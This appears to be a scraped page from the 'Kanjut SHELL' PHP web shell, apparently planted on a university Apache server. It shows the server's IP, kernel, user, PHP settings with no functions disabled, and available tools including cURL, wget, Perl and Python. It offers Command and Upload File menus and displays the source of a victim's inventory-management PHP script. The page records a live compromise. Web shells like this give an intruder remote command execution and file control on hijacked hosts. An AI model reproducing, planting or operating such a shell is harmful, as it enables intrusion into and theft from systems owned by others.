Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 13.58.201.240
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/wcdavis/www/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : //home/wcdavis/www/UposInven.php
<?php session_start(); ?> 
<head>
<link rel="stylesheet" type="text/css" href="upos.css">   
</head>
<center><H2>Inventory Management Menu</H2><HR></center> 
<p><A HREF="uposfindit.php">Find It</A><p>

<A HREF="uposcq.php">Change quantity</A><p>

<A HREF="uposadd.php">Add new items</A><p>
<hr>
<?php
	$username = $_SESSION['username'];
	$priority = $_SESSION['priority'];
	$storenum = $_SESSION['storenum'];
	echo "Currently being operated by $username at store $storenum";
	$_SESSION['username'] = $username;
	$_SESSION['storenum'] = $storenum;
	$_SESSION['priority'] = $priority;
?>
<br><br>
<a href="uposdir.php">
<img src="HouseBlack.png" width="64" height="64"></a><p>



Stv3n404 - 2023